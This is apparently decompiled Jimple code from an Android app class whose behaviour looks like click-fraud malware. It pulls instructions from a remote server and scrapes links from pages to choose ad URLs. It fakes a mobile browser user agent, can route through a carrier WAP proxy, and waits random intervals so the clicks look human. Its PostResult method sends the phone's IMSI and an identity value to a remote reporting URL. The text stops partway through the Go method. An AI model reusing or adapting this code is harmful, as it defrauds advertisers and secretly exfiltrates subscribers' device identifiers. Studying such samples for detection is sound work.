public class com.xxx.yyy.BBBB extends java.lang.Object
{
    java.lang.String TAG;
    private java.lang.String adurl;
    private android.content.Context context;
    private org.apache.http.client.CookieStore cookieStore;
    public int docount;
    private int dotype;
    public java.lang.String gwul;
    public java.lang.String hmul;
    private org.apache.http.impl.client.DefaultHttpClient httpClient;
    public java.lang.String identity;
    public java.lang.String imsi;
    private int iswap;
    private java.lang.String key;
    private java.lang.String myCookie;
    public java.lang.String prul;
    private int randomDoCount;
    private java.lang.String redirectUrl;
    private java.lang.String refer;
    private org.apache.http.HttpResponse response;
    private int result;
    private java.util.List urls;

    public void <init>(int, java.lang.String, java.lang.String, java.lang.String, java.lang.String, java.lang.String, int, android.content.Context, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        int i0, i1, $i2, $i3;
        java.lang.String r1, r2, r3, r4, r5, r7;
        android.content.Context r6;
        java.util.ArrayList $r8;
        org.apache.http.impl.client.DefaultHttpClient $r9, $r10, $r12, $r15;
        com.xxx.yyy.BBBB$LogRedirectHandler $r11;
        org.apache.http.params.HttpParams $r13, $r16;
        org.apache.http.HttpHost r14;

        r0 := @this: com.xxx.yyy.BBBB;
        i0 := @parameter0: int;
        r1 := @parameter1: java.lang.String;
        r2 := @parameter2: java.lang.String;
        r3 := @parameter3: java.lang.String;
        r4 := @parameter4: java.lang.String;
        r5 := @parameter5: java.lang.String;
        i1 := @parameter6: int;
        r6 := @parameter7: android.content.Context;
        r7 := @parameter8: java.lang.String;
        specialinvoke r0.<java.lang.Object: void <init>()>();
        r0.<com.xxx.yyy.BBBB: java.lang.String TAG> = "MyTag";
        r0.<com.xxx.yyy.BBBB: java.lang.String refer> = "";
        r0.<com.xxx.yyy.BBBB: org.apache.http.client.CookieStore cookieStore> = null;
        r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl> = "";
        r0.<com.xxx.yyy.BBBB: android.content.Context context> = r6;
        r0.<com.xxx.yyy.BBBB: int docount> = i0;
        r0.<com.xxx.yyy.BBBB: java.lang.String identity> = r1;
        r0.<com.xxx.yyy.BBBB: java.lang.String gwul> = r2;
        r0.<com.xxx.yyy.BBBB: java.lang.String hmul> = r3;
        r0.<com.xxx.yyy.BBBB: java.lang.String prul> = r4;
        r0.<com.xxx.yyy.BBBB: java.lang.String imsi> = r5;
        r0.<com.xxx.yyy.BBBB: int iswap> = i1;
        $r8 = new java.util.ArrayList;
        specialinvoke $r8.<java.util.ArrayList: void <init>()>();
        r0.<com.xxx.yyy.BBBB: java.util.List urls> = $r8;
        $r9 = new org.apache.http.impl.client.DefaultHttpClient;
        specialinvoke $r9.<org.apache.http.impl.client.DefaultHttpClient: void <init>()>();
        r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient> = $r9;
        $r10 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r11 = new com.xxx.yyy.BBBB$LogRedirectHandler;
        specialinvoke $r11.<com.xxx.yyy.BBBB$LogRedirectHandler: void <init>(com.xxx.yyy.BBBB)>(r0);
        virtualinvoke $r10.<org.apache.http.impl.client.DefaultHttpClient: void setRedirectHandler(org.apache.http.client.RedirectHandler)>($r11);
        $r12 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r13 = virtualinvoke $r12.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.params.HttpParams getParams()>();
        staticinvoke <org.apache.http.client.params.HttpClientParams: void setCookiePolicy(org.apache.http.params.HttpParams,java.lang.String)>($r13, "compatibility");
        $i2 = r0.<com.xxx.yyy.BBBB: int iswap>;
        if $i2 != 0 goto label0;

        r14 = new org.apache.http.HttpHost;
        specialinvoke r14.<org.apache.http.HttpHost: void <init>(java.lang.String,int)>("10.0.0.172", 80);
        $r15 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r16 = virtualinvoke $r15.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.params.HttpParams getParams()>();
        interfaceinvoke $r16.<org.apache.http.params.HttpParams: org.apache.http.params.HttpParams setParameter(java.lang.String,java.lang.Object)>("http.route.default-proxy", r14);

     label0:
        $i3 = specialinvoke r0.<com.xxx.yyy.BBBB: int GetRandomFromMinToMax(int,int)>(2, 4);
        r0.<com.xxx.yyy.BBBB: int randomDoCount> = $i3;
        r0.<com.xxx.yyy.BBBB: java.lang.String key> = r7;
        return;
    }

    private java.lang.String FindHttpHead(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1, r2, r3, $r6, $r7, $r8, r9, $r12, r13;
        int $i0, $i1, i2, $i3, i4;
        java.util.regex.Pattern $r4;
        java.util.regex.Matcher r5;
        boolean $z0, $z1, $z2;
        java.lang.StringBuilder $r10, $r11, $r14, $r15;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        r3 = "";
        $i0 = virtualinvoke r1.<java.lang.String: int indexOf(java.lang.String)>("<base href");
        if $i0 <= 0 goto label2;

        $r4 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("base href=\".*?\"");
        r5 = virtualinvoke $r4.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>(r1);

     label0:
        $z0 = virtualinvoke r5.<java.util.regex.Matcher: boolean find()>();
        if $z0 != 0 goto label1;

        return r3;

     label1:
        $r6 = virtualinvoke r5.<java.util.regex.Matcher: java.lang.String group()>();
        $r7 = virtualinvoke $r6.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("base href=\"|\"", "");
        r3 = virtualinvoke $r7.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("&amp;", "&");
        goto label0;

     label2:
        $z1 = virtualinvoke r2.<java.lang.String: boolean startsWith(java.lang.String)>("http://");
        if $z1 == 0 goto label4;

        $r8 = virtualinvoke r2.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("http://", "");
        $i1 = virtualinvoke $r8.<java.lang.String: int indexOf(java.lang.String)>("/");
        i2 = $i1 + 1;
        r9 = virtualinvoke $r8.<java.lang.String: java.lang.String substring(int,int)>(0, i2);
        $r10 = new java.lang.StringBuilder;
        specialinvoke $r10.<java.lang.StringBuilder: void <init>(java.lang.String)>("http://");
        $r11 = virtualinvoke $r10.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r9);
        r3 = virtualinvoke $r11.<java.lang.StringBuilder: java.lang.String toString()>();

     label3:
        return r3;

     label4:
        $z2 = virtualinvoke r2.<java.lang.String: boolean startsWith(java.lang.String)>("https://");
        if $z2 == 0 goto label3;

        $r12 = virtualinvoke r2.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("https://", "");
        $i3 = virtualinvoke $r12.<java.lang.String: int indexOf(java.lang.String)>("/");
        i4 = $i3 + 1;
        r13 = virtualinvoke $r12.<java.lang.String: java.lang.String substring(int,int)>(0, i4);
        $r14 = new java.lang.StringBuilder;
        specialinvoke $r14.<java.lang.StringBuilder: void <init>(java.lang.String)>("https://");
        $r15 = virtualinvoke $r14.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r13);
        r3 = virtualinvoke $r15.<java.lang.StringBuilder: java.lang.String toString()>();
        goto label3;
    }

    private void FixUrls(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1, r2, r4, $r7, $r9, $r10, $r11, $r12, $r14, $r16, $r17, $r19, $r20, $r24, $r25, $r28;
        java.util.regex.Matcher r3, r6, r15;
        java.util.regex.Pattern $r5, $r8, $r13;
        boolean $z0, $z1, $z2, $z3, $z4, $z6;
        int $i0, $i1;
        java.lang.StringBuilder $r18, $r21, $r23, $r26, $r27, $r29;
        java.util.List $r22;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        $r5 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("<a.*?/a>");
        r6 = virtualinvoke $r5.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>(r1);

     label0:
        $z0 = virtualinvoke r6.<java.util.regex.Matcher: boolean find()>();
        if $z0 != 0 goto label1;

        return;

     label1:
        $r7 = virtualinvoke r6.<java.util.regex.Matcher: java.lang.String group()>();
        $i0 = virtualinvoke $r7.<java.lang.String: int indexOf(java.lang.String)>("*");
        if $i0 <= 0 goto label2;

        $i1 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i1 != 1 goto label0;

        $r8 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("a href=\".*?\"");
        $r9 = virtualinvoke r6.<java.util.regex.Matcher: java.lang.String group()>();
        r3 = virtualinvoke $r8.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>($r9);
        $z1 = virtualinvoke r3.<java.util.regex.Matcher: boolean find()>();
        if $z1 == 0 goto label0;

        $r10 = virtualinvoke r3.<java.util.regex.Matcher: java.lang.String group()>();
        $r11 = virtualinvoke $r10.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("a href=\"|\"", "");
        $r12 = virtualinvoke $r11.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("&amp;", "&");
        r0.<com.xxx.yyy.BBBB: java.lang.String adurl> = $r12;
        return;

     label2:
        $r13 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String)>("a href=\".*?\"");
        $r14 = virtualinvoke r6.<java.util.regex.Matcher: java.lang.String group()>();
        r15 = virtualinvoke $r13.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>($r14);

     label3:
        $z2 = virtualinvoke r15.<java.util.regex.Matcher: boolean find()>();
        if $z2 == 0 goto label0;

        $r16 = virtualinvoke r15.<java.util.regex.Matcher: java.lang.String group()>();
        $r17 = virtualinvoke $r16.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("a href=\"|\"", "");
        r4 = virtualinvoke $r17.<java.lang.String: java.lang.String replaceAll(java.lang.String,java.lang.String)>("&amp;", "&");
        $z3 = virtualinvoke r4.<java.lang.String: boolean startsWith(java.lang.String)>("http://");
        if $z3 != 0 goto label4;

        $z4 = virtualinvoke r4.<java.lang.String: boolean startsWith(java.lang.String)>("./");
        if $z4 == 0 goto label5;

        $r18 = new java.lang.StringBuilder;
        $r19 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>(r2);
        specialinvoke $r18.<java.lang.StringBuilder: void <init>(java.lang.String)>($r19);
        $r20 = virtualinvoke r4.<java.lang.String: java.lang.String substring(int)>(2);
        $r21 = virtualinvoke $r18.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r20);
        r4 = virtualinvoke $r21.<java.lang.StringBuilder: java.lang.String toString()>();

     label4:
        $r22 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        interfaceinvoke $r22.<java.util.List: boolean add(java.lang.Object)>(r4);
        goto label3;

     label5:
        $z6 = virtualinvoke r4.<java.lang.String: boolean startsWith(java.lang.String)>("/");
        if $z6 == 0 goto label6;

        $r23 = new java.lang.StringBuilder;
        $r24 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>(r2);
        specialinvoke $r23.<java.lang.StringBuilder: void <init>(java.lang.String)>($r24);
        $r25 = virtualinvoke r4.<java.lang.String: java.lang.String substring(int)>(1);
        $r26 = virtualinvoke $r23.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r25);
        r4 = virtualinvoke $r26.<java.lang.StringBuilder: java.lang.String toString()>();
        goto label4;

     label6:
        $r27 = new java.lang.StringBuilder;
        $r28 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>(r2);
        specialinvoke $r27.<java.lang.StringBuilder: void <init>(java.lang.String)>($r28);
        $r29 = virtualinvoke $r27.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r4);
        r4 = virtualinvoke $r29.<java.lang.StringBuilder: java.lang.String toString()>();
        goto label4;
    }

    private int GetRandomFromMinToMax(int, int)
    {
        com.xxx.yyy.BBBB r0;
        int i0, i1, $i3, $i4;
        java.util.Random $r1;
        java.util.Date $r2;
        long $l2;

        r0 := @this: com.xxx.yyy.BBBB;
        i0 := @parameter0: int;
        i1 := @parameter1: int;
        $r1 = new java.util.Random;
        $r2 = new java.util.Date;
        specialinvoke $r2.<java.util.Date: void <init>()>();
        $l2 = virtualinvoke $r2.<java.util.Date: long getTime()>();
        specialinvoke $r1.<java.util.Random: void <init>(long)>($l2);
        $i3 = virtualinvoke $r1.<java.util.Random: int nextInt(int)>(i1);
        $i4 = i0 + $i3;
        return $i4;
    }

    private java.lang.String HppGet(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1, r2, r19, r23, r25;
        org.apache.http.client.methods.HttpGet r3;
        int $i0, i1;
        org.apache.http.client.CookieStore $r4, $r6, $r10;
        org.apache.http.protocol.BasicHttpContext r5;
        org.apache.http.impl.client.DefaultHttpClient $r7, $r9, $r13;
        org.apache.http.HttpResponse $r8, $r11, $r14, $r17, $r20, $r22;
        org.apache.http.StatusLine $r12;
        org.apache.http.client.ClientProtocolException $r15, r16;
        org.apache.http.Header r18;
        boolean $z0;
        org.apache.http.HttpEntity $r21;
        java.io.InputStream $r24;
        java.io.IOException $r26, r27;
        java.lang.Exception $r28, r29;
        java.lang.Throwable $r30;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        r3 = new org.apache.http.client.methods.HttpGet;
        specialinvoke r3.<org.apache.http.client.methods.HttpGet: void <init>(java.lang.String)>(r1);
        $i0 = virtualinvoke r2.<java.lang.String: int length()>();
        if $i0 <= 0 goto label0;

        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void addHeader(java.lang.String,java.lang.String)>("Referer", r2);

     label0:
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void addHeader(java.lang.String,java.lang.String)>("User-Agent", "J2ME/UCWEB7.4.0.57");
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void addHeader(java.lang.String,java.lang.String)>("Accept", "application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;");

     label1:
        $r4 = r0.<com.xxx.yyy.BBBB: org.apache.http.client.CookieStore cookieStore>;
        if $r4 == null goto label4;

        r5 = new org.apache.http.protocol.BasicHttpContext;
        specialinvoke r5.<org.apache.http.protocol.BasicHttpContext: void <init>()>();
        $r6 = r0.<com.xxx.yyy.BBBB: org.apache.http.client.CookieStore cookieStore>;
        virtualinvoke r5.<org.apache.http.protocol.BasicHttpContext: void setAttribute(java.lang.String,java.lang.Object)>("http.cookie-store", $r6);
        $r7 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r8 = virtualinvoke $r7.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest,org.apache.http.protocol.HttpContext)>(r3, r5);
        r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response> = $r8;

     label2:
        $r9 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r10 = virtualinvoke $r9.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.client.CookieStore getCookieStore()>();
        r0.<com.xxx.yyy.BBBB: org.apache.http.client.CookieStore cookieStore> = $r10;
        $r11 = r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response>;
        $r12 = interfaceinvoke $r11.<org.apache.http.HttpResponse: org.apache.http.StatusLine getStatusLine()>();
        i1 = interfaceinvoke $r12.<org.apache.http.StatusLine: int getStatusCode()>();

     label3:
        if i1 == 200 goto label9;

        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        return "";

     label4:
        $r13 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r14 = virtualinvoke $r13.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest)>(r3);
        r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response> = $r14;

     label5:
        goto label2;

     label6:
        $r15 := @caughtexception;
        r16 = $r15;

     label7:
        virtualinvoke r16.<org.apache.http.client.ClientProtocolException: void printStackTrace()>();

     label8:
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        return "";

     label9:
        $r17 = r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response>;
        r18 = interfaceinvoke $r17.<org.apache.http.HttpResponse: org.apache.http.Header getFirstHeader(java.lang.String)>("Set-Cookie");

     label10:
        r19 = null;
        if r18 == null goto label12;

     label11:
        r19 = interfaceinvoke r18.<org.apache.http.Header: java.lang.String getValue()>();

     label12:
        if r19 == null goto label14;

     label13:
        $z0 = virtualinvoke r19.<java.lang.String: boolean startsWith(java.lang.String)>("BAIDU_WISE_UID");
        if $z0 == 0 goto label14;

        r0.<com.xxx.yyy.BBBB: java.lang.String myCookie> = r19;

     label14:
        $r20 = r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response>;
        $r21 = interfaceinvoke $r20.<org.apache.http.HttpResponse: org.apache.http.HttpEntity getEntity()>();
        $r22 = r0.<com.xxx.yyy.BBBB: org.apache.http.HttpResponse response>;
        r23 = virtualinvoke r0.<com.xxx.yyy.BBBB: java.lang.String getContentCharset(org.apache.http.HttpResponse)>($r22);
        $r24 = interfaceinvoke $r21.<org.apache.http.HttpEntity: java.io.InputStream getContent()>();
        r25 = virtualinvoke r0.<com.xxx.yyy.BBBB: java.lang.String generateString(java.io.InputStream,java.lang.String)>($r24, r23);

     label15:
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        return r25;

     label16:
        $r26 := @caughtexception;
        r27 = $r26;

     label17:
        virtualinvoke r27.<java.io.IOException: void printStackTrace()>();

     label18:
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        return "";

     label19:
        $r28 := @caughtexception;
        r29 = $r28;

     label20:
        virtualinvoke r29.<java.lang.Exception: void printStackTrace()>();

     label21:
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        return "";

     label22:
        $r30 := @caughtexception;
        virtualinvoke r3.<org.apache.http.client.methods.HttpGet: void abort()>();
        throw $r30;

        catch org.apache.http.client.ClientProtocolException from label1 to label2 with label6;
        catch java.io.IOException from label1 to label2 with label16;
        catch java.lang.Exception from label1 to label2 with label19;
        catch java.lang.Throwable from label1 to label2 with label22;
        catch org.apache.http.client.ClientProtocolException from label2 to label3 with label6;
        catch java.io.IOException from label2 to label3 with label16;
        catch java.lang.Exception from label2 to label3 with label19;
        catch java.lang.Throwable from label2 to label3 with label22;
        catch org.apache.http.client.ClientProtocolException from label4 to label5 with label6;
        catch java.io.IOException from label4 to label5 with label16;
        catch java.lang.Exception from label4 to label5 with label19;
        catch java.lang.Throwable from label4 to label5 with label22;
        catch java.lang.Throwable from label7 to label8 with label22;
        catch org.apache.http.client.ClientProtocolException from label9 to label10 with label6;
        catch java.io.IOException from label9 to label10 with label16;
        catch java.lang.Exception from label9 to label10 with label19;
        catch java.lang.Throwable from label9 to label10 with label22;
        catch org.apache.http.client.ClientProtocolException from label11 to label12 with label6;
        catch java.io.IOException from label11 to label12 with label16;
        catch java.lang.Exception from label11 to label12 with label19;
        catch java.lang.Throwable from label11 to label12 with label22;
        catch org.apache.http.client.ClientProtocolException from label13 to label14 with label6;
        catch java.io.IOException from label13 to label14 with label16;
        catch java.lang.Exception from label13 to label14 with label19;
        catch java.lang.Throwable from label13 to label14 with label22;
        catch org.apache.http.client.ClientProtocolException from label14 to label15 with label6;
        catch java.io.IOException from label14 to label15 with label16;
        catch java.lang.Exception from label14 to label15 with label19;
        catch java.lang.Throwable from label14 to label15 with label22;
        catch java.lang.Throwable from label17 to label18 with label22;
        catch java.lang.Throwable from label20 to label21 with label22;
    }

    private void PostResult(int)
    {
        com.xxx.yyy.BBBB r0;
        int i0, $i1;
        java.lang.String r1, r2, $r4, $r5, $r7, $r11, $r12, $r14, $r15, r18, $r22, $r23, $r25, $r28;
        java.lang.StringBuilder $r3, $r6, $r8, $r9, $r10, $r13, $r16, $r17, $r21, $r24, $r26, $r27, $r29, $r30, $r31;
        java.lang.Exception $r20;

        r0 := @this: com.xxx.yyy.BBBB;
        i0 := @parameter0: int;
        r1 = "";

     label0:
        $r3 = new java.lang.StringBuilder;
        $r4 = r0.<com.xxx.yyy.BBBB: java.lang.String imsi>;
        $r5 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>($r4);
        specialinvoke $r3.<java.lang.StringBuilder: void <init>(java.lang.String)>($r5);
        $r6 = virtualinvoke $r3.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("&");
        $r7 = r0.<com.xxx.yyy.BBBB: java.lang.String identity>;
        $r8 = virtualinvoke $r6.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r7);
        $r9 = virtualinvoke $r8.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("&");
        $r10 = virtualinvoke $r9.<java.lang.StringBuilder: java.lang.StringBuilder append(int)>(i0);
        $r11 = virtualinvoke $r10.<java.lang.StringBuilder: java.lang.String toString()>();
        $r12 = r0.<com.xxx.yyy.BBBB: java.lang.String key>;
        r2 = staticinvoke <com.xxx.yyy.ddda: java.lang.String encrypt(java.lang.String,java.lang.String)>($r11, $r12);

     label1:
        r1 = r2;

     label2:
        $i1 = virtualinvoke r1.<java.lang.String: int length()>();
        if $i1 <= 0 goto label5;

        $r13 = new java.lang.StringBuilder;
        $r14 = r0.<com.xxx.yyy.BBBB: java.lang.String prul>;
        $r15 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>($r14);
        specialinvoke $r13.<java.lang.StringBuilder: void <init>(java.lang.String)>($r15);
        $r16 = virtualinvoke $r13.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("?im=");
        $r17 = virtualinvoke $r16.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r1);
        r18 = virtualinvoke $r17.<java.lang.StringBuilder: java.lang.String toString()>();

     label3:
        specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>(r18, "");
        return;

     label4:
        $r20 := @caughtexception;
        virtualinvoke $r20.<java.lang.Exception: void printStackTrace()>();
        goto label2;

     label5:
        $r21 = new java.lang.StringBuilder;
        $r22 = r0.<com.xxx.yyy.BBBB: java.lang.String prul>;
        $r23 = staticinvoke <java.lang.String: java.lang.String valueOf(java.lang.Object)>($r22);
        specialinvoke $r21.<java.lang.StringBuilder: void <init>(java.lang.String)>($r23);
        $r24 = virtualinvoke $r21.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("?imsi=");
        $r25 = r0.<com.xxx.yyy.BBBB: java.lang.String imsi>;
        $r26 = virtualinvoke $r24.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r25);
        $r27 = virtualinvoke $r26.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("&way=");
        $r28 = r0.<com.xxx.yyy.BBBB: java.lang.String identity>;
        $r29 = virtualinvoke $r27.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r28);
        $r30 = virtualinvoke $r29.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("&result=");
        $r31 = virtualinvoke $r30.<java.lang.StringBuilder: java.lang.StringBuilder append(int)>(i0);
        r18 = virtualinvoke $r31.<java.lang.StringBuilder: java.lang.String toString()>();
        goto label3;

        catch java.lang.Exception from label0 to label1 with label4;
    }

    private void SleepTime(int, int)
    {
        com.xxx.yyy.BBBB r0;
        int i0, i1, i2, $i3;
        long $l4;
        java.lang.InterruptedException $r1, r2;

        r0 := @this: com.xxx.yyy.BBBB;
        i0 := @parameter0: int;
        i1 := @parameter1: int;

     label0:
        i2 = specialinvoke r0.<com.xxx.yyy.BBBB: int GetRandomFromMinToMax(int,int)>(i0, i1);

     label1:
        if i2 < 0 goto label5;

        if i2 <= i1 goto label2;

        goto label5;

     label2:
        $i3 = i2 * 1000;
        $l4 = (long) $i3;
        staticinvoke <java.lang.Thread: void sleep(long)>($l4);

     label3:
        return;

     label4:
        $r1 := @caughtexception;
        r2 = $r1;
        return;

     label5:
        i2 = i0;
        goto label2;

        catch java.lang.InterruptedException from label0 to label1 with label4;
        catch java.lang.InterruptedException from label2 to label3 with label4;
    }

    static void access$0(com.xxx.yyy.BBBB, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1;

        r0 := @parameter0: com.xxx.yyy.BBBB;
        r1 := @parameter1: java.lang.String;
        r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl> = r1;
        return;
    }

    public void Go()
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1, r2, $r4, $r6, r8, $r9, $r10, r12, $r14, $r15, $r21, $r22, $r23, $r27, $r34, $r35;
        boolean z0;
        java.util.List $r3, $r16, $r17, $r18, $r19, $r24, $r28, $r29, $r30, $r31, $r32;
        int $i0, $i1, $i2, $i3, $i4, $i5, $i6, $i7, $i8, i9, $i10, $i11, $i12, $i13, $i14, $i15, $i16, $i17, $i18, $i19, $i20, $i21, $i22, $i23, $i24, i25, $i26, $i27, $i28, $i29, $i30;
        java.lang.String[] $r5, $r7;
        android.content.Context $r13;
        java.lang.Object $r20, $r33;
        org.apache.http.impl.client.DefaultHttpClient $r25;
        org.apache.http.conn.ClientConnectionManager $r26;

        r0 := @this: com.xxx.yyy.BBBB;
        r0.<com.xxx.yyy.BBBB: java.lang.String adurl> = "";
        $r3 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        interfaceinvoke $r3.<java.util.List: void clear()>();
        $r4 = r0.<com.xxx.yyy.BBBB: java.lang.String gwul>;
        r1 = specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>($r4, "");
        $i0 = virtualinvoke r1.<java.lang.String: int length()>();
        if $i0 <= 10 goto label11;

        $r5 = virtualinvoke r1.<java.lang.String: java.lang.String[] split(java.lang.String)>("\\|");
        $r6 = $r5[0];
        $i1 = staticinvoke <java.lang.Integer: int parseInt(java.lang.String)>($r6);
        r0.<com.xxx.yyy.BBBB: int dotype> = $i1;
        $r7 = virtualinvoke r1.<java.lang.String: java.lang.String[] split(java.lang.String)>("\\|");
        r8 = $r7[1];
        r0.<com.xxx.yyy.BBBB: java.lang.String refer> = r8;
        $i2 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i2 == 3 goto label0;

        $r9 = r0.<com.xxx.yyy.BBBB: java.lang.String hmul>;
        $i3 = virtualinvoke $r9.<java.lang.String: int length()>();
        if $i3 <= 5 goto label0;

        $r10 = r0.<com.xxx.yyy.BBBB: java.lang.String hmul>;
        specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>($r10, "");

     label0:
        specialinvoke r0.<com.xxx.yyy.BBBB: void SleepTime(int,int)>(15, 30);
        r12 = specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>(r8, "");
        $r13 = r0.<com.xxx.yyy.BBBB: android.content.Context context>;
        $r14 = virtualinvoke $r13.<android.content.Context: java.lang.String getString(int)>(2131034181);
        specialinvoke r0.<com.xxx.yyy.BBBB: void FixUrls(java.lang.String,java.lang.String)>(r12, $r14);
        r0.<com.xxx.yyy.BBBB: int result> = 1;
        r2 = "";
        $r15 = r0.<com.xxx.yyy.BBBB: java.lang.String adurl>;
        $i4 = virtualinvoke $r15.<java.lang.String: int length()>();
        if $i4 == 0 goto label1;

        $i5 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i5 != 2 goto label4;

     label1:
        $r16 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i6 = interfaceinvoke $r16.<java.util.List: int size()>();
        if $i6 <= 0 goto label4;

        r0.<com.xxx.yyy.BBBB: int result> = 2;
        $r17 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i7 = interfaceinvoke $r17.<java.util.List: int size()>();
        $i8 = 1 + $i7;
        i9 = specialinvoke r0.<com.xxx.yyy.BBBB: int GetRandomFromMinToMax(int,int)>(-1, $i8);
        if i9 < 0 goto label2;

        $r18 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i10 = interfaceinvoke $r18.<java.util.List: int size()>();
        $i11 = $i10 - 1;
        if i9 <= $i11 goto label3;

     label2:
        i9 = 0;

     label3:
        $r19 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $r20 = interfaceinvoke $r19.<java.util.List: java.lang.Object get(int)>(i9);
        r2 = (java.lang.String) $r20;

     label4:
        $i12 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i12 != 3 goto label5;

        r2 = "";

     label5:
        $r21 = r0.<com.xxx.yyy.BBBB: java.lang.String adurl>;
        $i13 = virtualinvoke $r21.<java.lang.String: int length()>();
        if $i13 <= 0 goto label6;

        $i14 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i14 != 1 goto label6;

        r2 = r0.<com.xxx.yyy.BBBB: java.lang.String adurl>;

     label6:
